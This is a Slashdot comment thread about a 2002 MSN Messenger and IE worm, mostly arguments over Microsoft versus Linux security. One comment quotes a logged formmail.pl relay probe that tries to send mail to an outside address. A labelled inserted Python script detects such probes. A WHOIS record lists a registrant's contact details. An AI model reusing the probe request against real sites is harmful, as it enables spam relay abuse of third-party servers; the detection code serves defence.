    4. Re:Not a Messenger flaw by rhavyn · · Score: 4, Interesting

      Hmm ... or maybe it's because that problem with Linux went away a long time ago. A default workstation install of Red Hat Linux 7.2 has zero open ports and a firewall that blocks access to all ports under 1024.

      Now, obviously if someone sets up a server and doesn't patch, that person is an idiot (and that is true no matter what OS he/she is running). Unfortunately for your argument, we're talking about an instant messenger client and a web browser, not things that are likely to be installed on a server. The fact is, you can't exploit my Linux system via Mozilla/Konq/Galeon/Netscape, yet every other week, a new way to exploit Windows using IE pops up.

      So, in conclusion, your argument is completely irrelevant to the topic at hand ... there has never been an exploit like this released against Linux, there is an exploit like this released against Windows about once a month ... I think we can safely start saying it's Microsoft's fault at some point.

    5. Re:Not a Messenger flaw by lessthan0 · · Score: 4, Interesting

      And next week, when the next batch of critical security flaws is revealed, follow the Microsoft DIR cycle...

      1. Download the patch.
      2. Install the patch.
      3. Reboot.

      Plan to do this every week on all your critical servers, work machines and home PCs. Just do this every week forever, or as long as you run a Microsoft OS and be done with it.

    6. Re:Not a Messenger flaw by essdodson · · Score: 0, Flamebait

      And in Linux news today, a patchset is now available to fix file system corruption introduced into the last patch... In other news lICQ has a known DoS, xchat's exploit has now been patched as well... Please download, build and reinstall, be sure to smile and act like your OS has no flaws while you're doing so.

      Same thing, different OS, no better, perhaps even worse... MS now even pushes patches to you. Just wait until braindead users find Linux.

      --
      scott
    7. Re:Not a Messenger flaw by CaptainSuperBoy · · Score: 3, Insightful

      A default install of Windows XP has zero open ports and a firewall, too. It automatically downloads security updates, which should prevent this IE exploit from becoming widespread.

      Maybe the problems you're talking about went away in Windows? For someone who is so up to date on Linux, you should learn a little about Windows before you bash it for past problems.

    8. Re:Not a Messenger flaw by hyyx · · Score: 1

      Plan to do this every week on all your critical servers...

      Who is running Messenger on their critical servers?

    9. Re:Not a Messenger flaw by Osty · · Score: 2, Informative

      Hmm ... or maybe it's because that problem with Linux went away a long time ago. A default workstation install of Red Hat Linux 7.2 has zero open ports and a firewall that blocks access to all ports under 1024.

      Except that Red Hat Linux 7.2 is not exactly all that old. Even as recently as RedHat 7.0, there were still security problems with a default install. That's what, a year old? And RedHat is not the only distro out there. And not everybody installing today is installing the latest versions. I spoke with a guy just recently who wanted to install SuSE 6.0 (SuSE is at version 7.3, now. 6.0 is roughly 2-2.5 years old, or so), simply because those were the CDs he had on-hand. I constantly see people trying to install RedHat 6.2, and even 5.2. As well, your argument is ignoring all those people that installed Linux back during the whole dot-bomb bubble (because Linux was the up-and-coming cool thing to have), and promptly forgot about that system in their back room running it. That's what, RedHat 6.0? SuSE 6.0? Slackware 4.0? Those installations are still a problem even today.


      Now, obviously if someone sets up a server and doesn't patch, that person is an idiot (and that is true no matter what OS he/she is running). Unfortunately for your argument, we're talking about an instant messenger client and a web browser, not things that are likely to be installed on a server. The fact is, you can't exploit my Linux system via Mozilla/Konq/Galeon/Netscape, yet every other week, a new way to exploit Windows using IE pops up.

      Right. Anyone setting up a server and not patching is an idiot. But that doesn't mean people aren't doing just that. Both Microsoft and RedHat have taken steps to protect against that, yet Microsoft is vilified while RedHat is heralded. That was exactly the point of the AC's comment. Yes, this article was about an IE exploit. Yes, his comment was off-topic. No, his comment is not ungrounded. Within the scope of his comment pertaining to servers, you know what he said is true. You might not want to believe it, but it is. Anyway, the reason why you don't see many exploits for Mozilla/Konq/Galeon/Netscape (three of which are all based on a single rendering engine, and the fourth can use that same engine as well) is because they are small potatoes compared to IE. There's just not much reason for hax0rs to spend their time finding exploits in those browsers when they're only going to hit maybe 5% of the browsing public (and I'm being generous). Microsoft software really doesn't have significantly more problems than any other software. Microsoft is simply a large target, and so many and more people spend much more time finding those holes (often for malicious purposes, sadly).


    10. Re:Not a Messenger flaw by Anonymous Coward · · Score: 0

      Then why doesn't it work in Trillian?
      It's not broken, it's a feature ;)

    11. Re:Not a Messenger flaw by Osty · · Score: 1

      Because Trillian is not Messenger. The way this works is IE embeds a Messenger COM object. Since Trillian, if it even defines a COM object that could be embedded by IE, is not Messenger, the GUID that defines the object will be different. Since the object is embedded by GUID, of course Trillian isn't going to work. However, if Trillian exposed the same or similar functionality in a COM object (not likely), and the so-called "virus" was targeted towards Trillian users (also not likely; too small of a target), then Trillian would be "affected".

    12. Re:Not a Messenger flaw by rhavyn · · Score: 2

      Where exactly in my post did I bash Windows? I pointed out that I agree that server admins that don't patch systems are at fault if their server has problems. But, I also pointed out that we're not talking about servers being exploited, we're talking about software which runs on top of Windows consistently having gaping holes.

      Microsoft could put as many firewalls as they want to into their product, but IE (or Outlook, or uPNP, name your exploit of the week) continually has holes in it. A web browser should not have the capability to cause the havoc that IE has caused for Microsoft users (and don't even get me started on Outlook).

      Not that there aren't plenty of reasons to bash Windows, please don't imply that I'm doing something that I'm obviously not doing (and don't automatically assume that I know nothing about Windows just because I know something of Linux).

    13. Re:Not a Messenger flaw by Anonymous Coward · · Score: 0
      Plan to do this every week on all your critical servers, work machines and home PCs. Just do this every week forever, or as long as you run a Microsoft OS and be done with it.
      Or, you could switch to linux. Because linux never has any bugs. Never. Nuh-uh.
    14. Re:Not a Messenger flaw by rhavyn · · Score: 4, Insightful
      You were doing good up to here:


      Microsoft software really doesn't have significantly more problems than any other software. Microsoft is simply a large target, and so many and more people spend much more time finding those holes (often for malicious purposes, sadly).


      IE has the biggest marketshare, and Windows has the biggest desktop marketshare, but the reason that people attack Windows systems is it's easy. I wish people would stop kidding themselves with the market share excuse. MS software has serious design flaws which makes it very easy to exploit a flaw in the browser to extract data from the registry and mail that off to some email address. Under windows, that is easy, under Linux there are multiple different browsers, you don't know what email client might be available, there is no central place to grab system/user info and there is no easy way to automate the process. The same type of exploit is used over and over and over again, yet for every patch MS releases, someone finds a new way to write an exploit that uses the same basic method. How long, exactly, do you think it's going to take before Microsoft recognizes this and fixes the design flaws instead of releasing patches which amount to little more than sticking their finger in the crack in the dam?

    15. Re:Not a Messenger flaw by vinnythenose · · Score: 1

      Actually (this might have been stated earlier, so forgive me). You can't place all the blame on Microsoft, but a good portion of it. The holes are still there in Linux, they get exploited all the time. When you exploit a hole in MS products, it becomes a huge problem because a lot more people use them. Whereas if you exploit a linux hole, then a smaller amount of people are affected, and the vast majority tend to have more computer knowledge so they can fix and patch it up quickly.

      It's just statistics, it's a proven fact that any complex software will have bugs and exploits, it's just how many people use it. Plus the more people using MS products means more malicious people using it (why target the minority if you want to be a pain in the ass).

      But yes, Microsoft really does need to think a few things out better when they're making their code. But I don't hold them 100% responsible for the exploits (although their responses to the exploits could be better).

      --
      --- I used to moderate, then I read the -1 articles and decided having to filter through them was not worth it.
    16. Re:Not a Messenger flaw by Anonymous Coward · · Score: 0

      Did you notice, out of curiosity, that at the same time as the last big huzzah about IE having a major vulnerability, Netscape released a new .01 release of both 4.7x and 6.2x fixing the same problem? Other software is no less susceptible to these things than Microsoft's, the difference really is that a Mac vulnerability would be nowhere near so exploitable as a Windows one, thus practically nobody even looks. (Nobody who isn't a lot more subtle than these folks, anyhow.)

    17. Re:Not a Messenger flaw by Malcontent · · Score: 3, Funny

      "Install the patch and be done with it."

      On all 5000 desktops of your corporation.

      --

      War is necrophilia.

    18. Re:Not a Messenger flaw by Anonymous Coward · · Score: 0

      This is a problem with messenger - the fact that it allows a (admittedly "trusted") web page to access its contacts list and also send messages/files etc to them. If access to this object model was blocked the same way access to the Outlook XP model was (it pops up a window asking you if you want to allow another program to send mail) then this would never have happened.

    19. Re:Not a Messenger flaw by Anonymous Coward · · Score: 0

      "First off, this is not a virus."

      damn right boy its a feature!!!

      pkm

    20. Re:Not a Messenger flaw by mystran · · Score: 1
      the question here is that setting up a TCP port for incoming connections should be so hard that only a hardcore wizard (guru's not good enough) can do it...

      from them we MIGHT be able to expect even SOME sort of idea about what patching and updating is all about.. then again.. MS has taught people that patching means new features so many will just think "it works fine, why patch ?"

      Also it has become common that there are no patches to old versions.. you can't have the security without new features.. and some of those features might break your config.. this is not the case just with MS but also with Open Source and Free Software (as in speech)

      --
      Software should be free as in speech, but if we also get some free beer, all the better.
    21. Re:Not a Messenger flaw by ConsumedByTV · · Score: 3, Insightful
      Pig headed idiot.

      A couple of things:



      As someone that's "so up to date on windows", you should learn a little about it before you start to talk about it.

      Everything has problems; microsoft just puts the problems into the hands of people that cannot fix it, the end user.

      --


      "Not my manner of thinking but the manner of thinking of others has been the source of my unhappiness." - M
    22. Re:Not a Messenger flaw by Anonymous Coward · · Score: 0

      It's true that these are fundamental design flaws in Microsoft products but don't expect to see that change anytime soon. The main reason that MS products are easier to exploit is that they do everything in their power to make it easy for the end user. They're willing to plug the holes as they come up for the sake of ease of use. If you create a Linux distro that even my grandmother could install and use I'd be willing to bet it would have just as many holes.

      And before anyone starts thinking I'm a MS fan, as soon as they port Dark Ages of Camelot and a couple of other games to linux I'm burning windows CD's :)

    23. Re:Not a Messenger flaw by jesser · · Score: 2

      under Linux there are multiple different browsers, you don't know what email client might be available, there is no central place to grab system/user info and there is no easy way to automate the process

      Security through obscurity? No thanks. That only makes it harder to write a payload for a worm or virus; it doesn't make propagation much harder.

      --
      The shareholder is always right.
    24. Re:Not a Messenger flaw by maxpublic · · Score: 1

      It has nothing to do with obscurity. Unless you can grab root access you can't do anything at all interesting. A fundamental difference in architecture.

      Your only hope with Linux is that the operator is an idiot. In Windows the operator is likely to be an idiot, but if not the OS will happily make him look like one.

      Max

      --
      My god carries a hammer. Your god died nailed to a tree. Any questions?
    25. Re:Not a Messenger flaw by CaptainSuperBoy · · Score: 2

      Auto-update is on by default in Windows XP, it is set to prompt you before downloading and prompt you again before installing the patch. Or would you rather have it install random software without asking you?

      The UPNP flaw is fixed by XP's auto-update.

      And, pig headed idiot? Come on, you're not even trying there.

    26. Re:Not a Messenger flaw by CaptainSuperBoy · · Score: 2

      Where exactly in my post did I bash Windows?

      Right here:

      every other week, a new way to exploit Windows using IE pops up

      My point was, you were comparing this year's Linux to last year's Windows. WinXP, with security updates, is reasonably secure. Even Redhat 7.2 has over 30 security updates.

  19. interesting article on the reg by rogueuk · · Score: 5, Informative

    the register had an article about this a few days ago. A flawed Document.Open() in the script apparently causes it. The demo site the reg links to is pretty interesting. And of course, MS has known about this since december :-P

    1. Re:interesting article on the reg by Covant · · Score: 1

      Of course. They probably know about all the security flaws before they happen, they just don't bother to fix them.

      It's like in Fight Club, the formula, if a (the cost of paying 10 programmers $100k/Annum each) * b (the time it would take to fix) * c (the percent of people that wouldn't buy/use IE / Windows regardless of the plethora of flaws) is greater than some inane constant, they don't fix it.

      until it blows up.

      --
      "Peace, Love and Apathy"
    2. Re:interesting article on the reg by calags · · Score: 0, Offtopic

      You know a really virulent virus is coming when Microsoft insiders suddenly sell as much MS stock as they can. Just like the Enron higher ups they'll cut and run.

      This brings up a question: If a real devastating security flaw is reported to them; they keep mum about it and then a massive security breach occurs that wipes out most MS OS machines out there (you know it's bound to happen :) does that mean that the SEC can move on them due to insider information?

      --
      Never attribute to stupidity what can be construed as a monopoly preservation tactic.
    3. Re:interesting article on the reg by Osty · · Score: 1

      It's like in Fight Club, the formula, if a (the cost of paying 10 programmers $100k/Annum each) * b (the time it would take to fix) * c (the percent of people that wouldn't buy/use IE / Windows regardless of the plethora of flaws) is greater than some inane constant, they don't fix it.

      Boy, I sure wish I was getting $100K/year. Oh well. Anyway, that equation is not quite correct, because

      1. It shouldn't take 10 programmers to fix that flaw. Maybe one programmer, one tester. Two people.
      2. Those people are going to get paid anyway. It's not like they're hired on the spot to fix those problems. They're already on the payroll, and fixing bugs is part of the job description.
      3. The time it takes to fix is only relevant if it affects other work. This is not always the case (not that it doesn't affect other work, but that it doesn't significantly hurt the other work in terms of slipping on a timeframe).
      4. The equation is typically a*b > c, they don't fix it, not a*b*c > some arbitrary number. In the Fight Club case, c was the cost of litigation (including settlements). In your example, it would be lost revenue. I'm not so sure that's a good measure, here, since IE is free.

      Of course, this applies to pretty much every business, not just Microsoft.
    4. Re:interesting article on the reg by targo · · Score: 2, Insightful

      And of course, MS has known about this since december :-P


      Yes, and there has been a patch for this problem. So what did you expect MS to do? Spam all the IM users to install the patch? C'mon.
      Btw, WindowsUpdate prompts you to install this patch, I don't see what else should have been done about it ("this bug should not have been there" rants don't count as a solution).

    5. Re:interesting article on the reg by Anonymous Coward · · Score: 0

      True true... I probably should have been more scientific and actually created a formula. :)

      Not just jabbered.

    6. Re:interesting article on the reg by Anonymous Coward · · Score: 0

      It was found, it was fixed when it was found, the was posted. If people don't patch their own machines, how is MS supposed to fix that? Like any piece of buggy OS crap does any better? You need to read outside the /. universe once or twice. I suggest security focus for one. MS hardly has the monopoly on bugs. And once again, IT WAS FIXED WEEKS AGO!

    7. Re:interesting article on the reg by Anonymous Coward · · Score: 0
      Sorry, you are wrong. This is not the free-wheeling world of open source we are talking about here that runs in build-and-fix mode.

      1. You can't assume it won't take 10 programmers.
      2. What, they are on payroll and just sit around with no work other than fixing bugs? No other projects that might have a priority?
      3. Slipping a timeframe in a publicly traded company can affect how they report revenues. Can't report revenues of money collected on a product that hasn't been released.
      4. IE is free to the end user, but not free to create. It does take time to build and package, even if the fix takes 10 minutes.

      Before you apply business rules to an industry, you should work in that industry.

    8. Re:interesting article on the reg by ahde · · Score: 2

      IE cost me 150 bucks. Plus, I need to pay $50 a month just to install patches.

    9. Re:interesting article on the reg by tswinzig · · Score: 2

      And of course, MS has known about this since december :-P

      Perhaps that is why a patch is already available which fixes this problem? (And has been available for a while.)

      --

      "And like that ... he's gone."
    10. Re:interesting article on the reg by Anonymous Coward · · Score: 0

      I work for microsoft and we got an email this morning from the security group telling us it was a mandatory update...

      -Sam

    11. Re:interesting article on the reg by sam_handelman · · Score: 5, Funny

      "this bug should not have been there" rants don't count as a solution

      You're artificially restricting the sphere of possible solutions to things that might help, which is intellectually honest. Shame on you.

      In ancient Sumeria, they used to execute architects when the buildings that they constructed collapsed. By the same token, we should kill some people.

      If we've learned one thing from the 20th century, it is that big government is inefficient. Therefore, the killings should be handled by the private sector.

      The proceedings against MS are criminal, in addition to civil. In a criminal proceeding, the judge is perfectly justified in issuing fatwas against MS programmers who write buggy code - this is a well established precept of Sharia.

      Thus, I've proven that the free market will take care of MS on its own, punishing it for buggy programming - through highly paid mercenary assassins, with EULAs to kill.

      I want to test and see if anyone reads their EULAs. Distribute a piece of software with an EULA that says, about halfway through-
      "By installing this software, you agree to take up arms in defense of (company name), march to the fastness of her foe, and slaughter her enemies. Please register the software so that we can give you your orders."

      --
      The good and new comes from no quarter where it is looked for, and is always something different from what is expected.
    12. Re:interesting article on the reg by Osty · · Score: 1

      Sorry, you are wrong. This is not the free-wheeling world of open source we are talking about here that runs in build-and-fix mode.

      1. You can't assume it won't take 10 programmers.

      I can, I will, and I did assume so. You obviously don't understand how large software projects are typically managed -- single people each own various different pieces. Likely, there's one or two guys that own the document.object piece of the scripting engine used by Internet Explorer, and those are the guys that would be tasked with fixing this. Tack on one tester to make sure it works, and maybe one program manager to document the problem/fix, and you come up with 4, maybe 5 people.


      2. What, they are on payroll and just sit around with no work other than fixing bugs? No other projects that might have a priority?

      Yes, they're on the payroll. No, they don't just sit around with no work other than fixing bugs. However, bugfixing is part of the job description. It needs doing. Most bug fixes generally are not very time consuming. The most time consuming part of fixing bugs is getting a valid repro. After that, in 90% of the cases, it's changing maybe one or two lines of code. The repro has already been done. Check BugTraq. That means the programmers just have to reproduce this in a lab, track it down, fix the problem, and hand it off. Two, maybe three days of work, tops. Highly unlikely that'll affect a different project, unless that project is already in ship mode. (In which case, you leverage one of your other developers who has a few free cycles.)


      3. Slipping a timeframe in a publicly traded company can affect how they report revenues. Can't report revenues of money collected on a product that hasn't been released.

      Red herring, per #2 above.


      4. IE is free to the end user, but not free to create. It does take time to build and package, even if the fix takes 10 minutes.

      Builds happen every single day at Microsoft (that's why you see large version numbers, like Windows 2000 was 5.0.2195). The infrastructure is already there, it's just a matter of using it. Packaging is generally done in the build process. Ship it off to Windows Update, let them deal with it afterwards. This is typical for most software development houses.


      Before you apply business rules to an industry, you should work in that industry.

      I do work in the industry. Do I have your permission now?

    13. Re:interesting article on the reg by Anonymous Coward · · Score: 0

      Sam, how can you look at yourself in the mirror every morning? I mean, is it the money that makes it bearable, or are there just a lot more hot stupid chicks in Redmond that the rest of us don't know about?

    14. Re:interesting article on the reg by the+phantom · · Score: 2

      Rather, architects were executed if their buildings collapsed and killed the owner. If the owner's son was killed, then the architect's son was executed. Lex talionis.

      But I'm WAY offtopic.

    15. Re:interesting article on the reg by Error27 · · Score: 2

      >>Yes, and there has been a patch for this problem. So what did you expect MS to do? Spam all the IM users to install the patch?

      Maybe they could send an email that describes the problem and the fix.

      Also they could put a link on microsoft.com or create a site called security.microsoft.com.

      These things are fairly common from companies that don't treat their customers like dirt.

    16. Re:interesting article on the reg by Sklivvz · · Score: 2, Informative

      The patch does not work!!!! See here!

      thanks bill.... :-(

    17. Re:interesting article on the reg by Alsee · · Score: 2

      If the owner's son was killed, then the architects son was executed.

      Then I guess you kill the owner if the architect is the owner's father, hehe.

      -

      --
      - - You can't take something off the Internet! That's like trying to take pee out of a swimming pool.
    18. Re:interesting article on the reg by randomgeek · · Score: 1

      You mean like this or this?

    19. Re:interesting article on the reg by KnightStalker · · Score: 2
      If we've learned one thing from the 20th century, it is that big government is inefficient. Therefore, the killings should be handled by the private sector.

      Actually, I believe the 20th century taught us that big government is only efficient at the task of killing people.

      --
      * And remember, it's spelled N-e-t-s-c-a-p-e, but it's pronounced "Mozilla."
    20. Re:interesting article on the reg by juan2074 · · Score: 1

      Too funny! Unfortunately, I have no mod points to give.

    21. Re:interesting article on the reg by Error27 · · Score: 2

      Those links are not useful.

      Compare them to something like security.debian.org or redhat.com/errata/ or sunsolve.sun.com/security. These links give information about what programs had security problems.

      The first link you provided doesn't seem to have any useful information. The second link is too hard to remember. It also doesn't give any useful information.

      The correct link if you want Microsoft security information is:
      http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/current.asp

      I think that the fact you couldn't find the correct link proves my point that Microsoft needs to have a site dedicated to providing security information for their products.

  20. Kinda funny.. by jfroot · · Score: 5, Funny

    I get this message from this girl I kind of like on MSN saying to go to this URL urgently. So I do (duh!). Turns out it is a porn site.. So I'm thinking what is this girl saying? Is she dropping some not so subtle hints? As I ponder this I get a MSN message from my mom asking me why I sent her a link to a porn site.. then I understood..

    1. Re:Kinda funny.. by Anonymous Coward · · Score: 0

      Why did you send your mother a link to a porn site?

    2. Re:Kinda funny.. by Anonymous Coward · · Score: 0

      Cartman, your mother's on the cover of Crack-Wh0re Magazine!

    3. Re:Kinda funny.. by Intel86 · · Score: 1

      Getting porn links isn't what bothers me, it's sending them to your ex-g/f who you have blocked in your MSN Contacts.

    4. Re:Kinda funny.. by Anonymous Coward · · Score: 0

      Dude, tell your mom to stop sending me pr0n links.

  21. Warhol? worm by blkros · · Score: 5, Informative

    The worm seems to be named because of a quote that the site attributes to Andy Warhol.(ie. 'in the future everyone will have his 15 minutes of fame.') That quote should actually be attributed to Marshal MacLuhan, who Andy ripped it off from. So these worms should be named MacLuhan worms.

    --
    Damnit, Jim, I'm an anarchist, not a F@#$!^& doctor!
    1. Re:Warhol? worm by Anonymous Coward · · Score: 0

      How do you think Andy got his 15 min of fame? By ripping off that quote, the guy who originally said it also got 15 min somewhere too. Kind of ironic, eh?

    2. Re:Warhol? worm by Anonymous Coward · · Score: 0

      Well, McLuhan did talk about that whole "The Medium is the Message" thing ... perhaps, in some twisted way, this signifies that Microsoft products are viral?

    3. Re:Warhol? worm by foghorn19 · · Score: 1

      The correct name is Marshall McLuhan.

    4. Re:Warhol? worm by hayden · · Score: 1
      So these worms should be named MacLuhan worms.

      And that is why he chose to attribute it to Warhol.

      --
      Nerd: Derogatory term typically directed at anybody with a lower Slashdot ID than you.
    5. Re:Warhol? worm by interiot · · Score: 3, Funny

      Where's my "+1, Ironic" mod when I need it?

    6. Re:Warhol? worm by Anonymous Coward · · Score: 0

      The correct name is Marshall McLuhan

      Thanks a few bllion, dude. I'd never have guessed who he was talkig about without your fine and welcome help. They didn't really send you to /. to learn to spell, did they?

    7. Re:Warhol? worm by d314 · · Score: 1

      Warhol seemed to create 'found art.' I'd give the phrase to him.

  22. :o by bender183 · · Score: 1

    I think the biggest implication of this is what the poster originally posted. If m$ is going to make messaging a corner stone of their .NET project the potential for a more advanced virus than this one could really mess sh*t up. :o

  23. Not so sure the story is accurate. by einhverfr · · Score: 4, Interesting

    The page appears to post a hidden form with your email information to the page. I suspect that it may be a contact gatherer for spammers (a new low...) though it could have done much more.

    FormMail.pl is the perl script which receives this information. It is pretty interesting...

    --

    LedgerSMB: Open source Accounting/ERP
    1. Re:Not so sure the story is accurate. by brain159 · · Score: 2, Interesting
      quite probably unrelated to this is a few days ago my website got hit by some apparent script which was searching for "open" formmail.pl scripts to abuse by trying to send an email off to some random guy (I guess formmail.pl is fairly standard - the owner of the site whose script is being used may be an innocent relay in the warhol worm/virus). Here's the apache log line of when my site was scanned, just in case anyone else has spotted similar:

      24.90.121.snip - - [12/Feb/2002:00:38:16 -0500] "GET /cgi-bin/formmail.pl?email=f2%40aol%2Ecom&subject=bbx%2Eflarp%2Enet%2Fcgi%2Dbin%2Fformmail%2Epl&recipient=icases0ber%40aol%2Ecom&msg=w00t HTTP/1.1Content-Type: application/x-www-form-urlencoded" 404 295 "-" "Gozilla/4.0 (compatible; MSIE 5.5; windows 2000)"

      It's RoadRunner cable modem service apparently, and the browser info is obviously going to be rubbish.
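
Added example (not part of the post above, and not code from any project mentioned in the thread): a Python filter that picks formmail.pl relay probes like the one in that log line out of an Apache combined-format access log. The sample log lines, addresses and the `own_domains` set are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Apache combined log format. The request field is captured whole because
# scanners often send a malformed request line.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>.*?)" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?\s*$'
)
SCRIPT_RE = re.compile(r'/formmail(\.pl|\.cgi)?$', re.IGNORECASE)
PROTO_RE = re.compile(r'HTTP/\d\.\d')


def inspect_line(line, own_domains):
    """Return a finding dict for a suspicious formmail request, else None.

    Only GET-style requests carry their parameters in the log; a POST to the
    script would need the request body, which access logs do not record.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = m["request"].split(" ", 2)
    if len(parts) < 2:
        return None
    target = urlsplit(parts[1])
    if not SCRIPT_RE.search(target.path):
        return None

    params = parse_qs(target.query)  # also undoes the %40 / %2E encoding
    reasons = []

    # 1. Mail addressed outside the site: the script is being used as a relay.
    recipients = [r.strip() for v in params.get("recipient", [])
                  for r in v.split(",") if r.strip()]
    outside = [r for r in recipients
               if r.rpartition("@")[2].lower() not in own_domains]
    if outside:
        reasons.append("recipient-outside-site")

    # 2. The subject carries the script's own URL, so the receiving mailbox
    #    learns which host answered.
    if any("formmail" in s.lower() for s in params.get("subject", [])):
        reasons.append("subject-names-script")

    # 3. Header text glued onto the protocol token, as in the posted line.
    proto = parts[2] if len(parts) == 3 else ""
    if not PROTO_RE.fullmatch(proto):
        reasons.append("malformed-request-line")

    if not reasons:
        return None
    return {"client": m["client"], "time": m["time"],
            "status": int(m["status"]), "recipients": outside,
            "reasons": reasons}


def summarise(lines, own_domains):
    """Group findings per client; 'answered' counts non-error responses,
    i.e. probes that reached a script that actually exists."""
    out = defaultdict(lambda: {"hits": 0, "answered": 0, "reasons": set()})
    for line in lines:
        f = inspect_line(line, own_domains)
        if f is None:
            continue
        entry = out[f["client"]]
        entry["hits"] += 1
        entry["answered"] += 1 if f["status"] < 400 else 0
        entry["reasons"].update(f["reasons"])
    return {c: {**e, "reasons": sorted(e["reasons"])} for c, e in out.items()}


# Constructed sample log (documentation address ranges and example domains).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2002:10:00:00 -0500] "GET /cgi-bin/formmail.pl?'
    'email=a%40example%2Eorg&subject=www%2Eexample%2Ecom%2Fcgi%2Dbin%2F'
    'formmail%2Epl&recipient=probe%40example%2Eorg&msg=test HTTP/1.1'
    'Content-Type: application/x-www-form-urlencoded" 404 295 "-" '
    '"Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"',
    '198.51.100.7 - - [01/Jan/2002:10:01:00 -0500] "GET /cgi-bin/formmail.pl?'
    'recipient=webmaster%40example%2Ecom&subject=Feedback HTTP/1.0" 200 512 '
    '"http://www.example.com/contact.html" "Mozilla/4.0"',
    '203.0.113.5 - - [01/Jan/2002:10:02:00 -0500] "GET /index.html HTTP/1.1" '
    '200 2048 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [01/Jan/2002:10:03:00 -0500] "GET /cgi-bin/FormMail.pl?'
    'recipient=probe%40example%2Eorg&subject=hi HTTP/1.1" 200 1024 "-" '
    '"Mozilla/4.0"',
]

if __name__ == "__main__":
    for client, info in summarise(SAMPLE_LOG, {"example.com"}).items():
        print(client, info)
```

A non-zero `answered` count is the case worth acting on first: the script exists and accepted a recipient outside the site's own domains.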

  24. It's really an IE virus by _fuzz_ · · Score: 1, Redundant
    The MSN Messenger protocol has nothing in it that would allow the retrieval of contacts, etc. (I've implemented a Java library that speaks msn messenger: MSNj (shameless plug)). The protocol isn't any more or less secure than HTTP.

    The virus probably just gets the COM object that their messenger implements through javascript. The security hole is that IE lets a web page talk to the messenger client. I would guess that it does that so you can add contacts by clicking on web links and stuff like that.

    --
    47% of all statistics are made up on the spot.
    1. Re:It's really an IE virus by Anonymous Coward · · Score: 0

      It's really an IE virus that uses MSN as an infection platform. The tight integration between the two makes an exploit like this easy to use. This is an IE hole.. And MSN is what's spreading it to your computer.

      Or, more accurately, spreading it past your computer.. The user, of course, is ultimately at fault (so what else is new).

    2. Re:It's really an IE virus by Anonymous Coward · · Score: 0

      Hey, that's cool. Thanks for the link.

    3. Re:It's really an IE virus by ethereal · · Score: 1

      The user is not at fault. Don't blame the victim. There is no reason that following a link to a web page should divulge that kind of personal information about me and my contact list. This is a flaw in the user's software in that it violates the principle of least surprise - it doesn't do what you'd expect it to do.

      --

      Your right to not believe: Americans United for Separation of Church and

  25. Finally! by digitalcowboy · · Score: 5, Funny

    I've been reluctant to use the MS IM client because it didn't appear they had fully integrated its virus abilities with all their other software. Now that it's part of a fully integrated Microsoft Virus Productivity Suite, I'm ready!

    Can anybody tell me where I can sign up for one of those Passport Universal Identifier and Cybercash Wallets and get the MS implant in my right hand or forehead?

    1. Re:Finally! by Anonymous Coward · · Score: 0

      Now I understand what .NET is. Write a virus once and it will run it anywhere .NET is running.

    2. Re:Finally! by Anonymous Coward · · Score: 0

      I'm writing a virus to steal your forehead right now...

    3. Re:Finally! by archen · · Score: 1

      With MS you don't get it on your hand or your forehead, you take it in the rear.

  26. It works by: by Anonymous Coward · · Score: 0

    using the document.open bug in IE. Details of which were first published Here. Users of third party clients are not affected. -H2

  27. Microsoft Article Virus Sweeps Slashdot by guttentag · · Score: 3, Funny
    Four entries in the Microsoft topic in one day?
    1. Microsoft Instant Messenger Virus Sweeps Net
    2. What is .NET?
    3. States Demand Windows Source Code
    4. Details of MSFT's Antitrust Lobbying
    There were none yesterday, or the day before... the calm before the storm...
    1. Re:Microsoft Article Virus Sweeps Slashdot by Anonymous Coward · · Score: 0

      Actually I'd like to know why this is of any issue to slashdotters at all. I mean it's beginning to look like slashdot is nothing more than a microsoft news site. Who gives a flying fuck?

    2. Re:Microsoft Article Virus Sweeps Slashdot by MoneyT · · Score: 1

      All of us self made, armchair warrior, microsoft bashers care. We like finding flaws in M$ systems. It isn't that we don't acknowledge our own system's flaws, it's that we find it funny that the OS with quite possibly the biggest and highest paid dev team has some of the most easily exploited bugs. For such a "user friendly" system, all these "on by default" setups seem to be counter productive to users.

      And what exactly is a flying fuck?

      --
      T Money
      World Domination with a plastic spoon since 1984
    3. Re:Microsoft Article Virus Sweeps Slashdot by Anonymous Coward · · Score: 0

      And what exactly is a flying fuck?
      Like a duck, and a welsh farmer...

    4. Re:Microsoft Article Virus Sweeps Slashdot by Tony-A · · Score: 1

      It might be the only microsoft news site that's actually worth anything, but well under 10 percent of /. is Microsoft related.

  28. Re:No DNS Record? (Geeky Observations) by jfroot · · Score: 2, Informative

    Just go to the registrar www.godaddy.com:

    MASENKO-MEDIA.NET WHOIS results:

    The data contained in Go Daddy Software, Inc.'s WHOIS database,
    while believed by the company to be reliable, is provided "as is"
    with no guarantee or warranties regarding its accuracy. This
    information is provided for the sole purpose of assisting you
    in obtaining information about domain name registration records.
    Any use of this data for any other purpose, including, but not
    limited to, allowing or making possible dissemination or
    collection of this data in part or in its entirety for any
    purpose, such as the transmission of unsolicited advertising and
    solicitations, is expressly forbidden without the prior written
    permission of Go Daddy Software, Inc. By submitting an inquiry,
    you agree to these terms of usage and limitations of warranty.

    Registrant:
    Net Crater
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States

    Registrar: Go Daddy Software (http://registrar.godaddy.com)
    Domain Name: MASENKO-MEDIA.NET
    Created on: 06-Feb-02
    Expires on: 06-Feb-03
    Last Updated on: 06-Feb-02

    Administrative Contact:
    Crater, Net domains@netcrater.com
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States
    3365917696
    Technical Contact:
    Crater, Net domains@netcrater.com
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States
    3365917696

    Domain servers in listed order:
    NS1.NETCRATER.COM
    NS2.NETCRATER.COM

  29. Re:No DNS Record? (Geeky Observations) by Anonymous Coward · · Score: 1

    You fucking moron! The domain record applies to the domain only.

    whois masenko-media.net

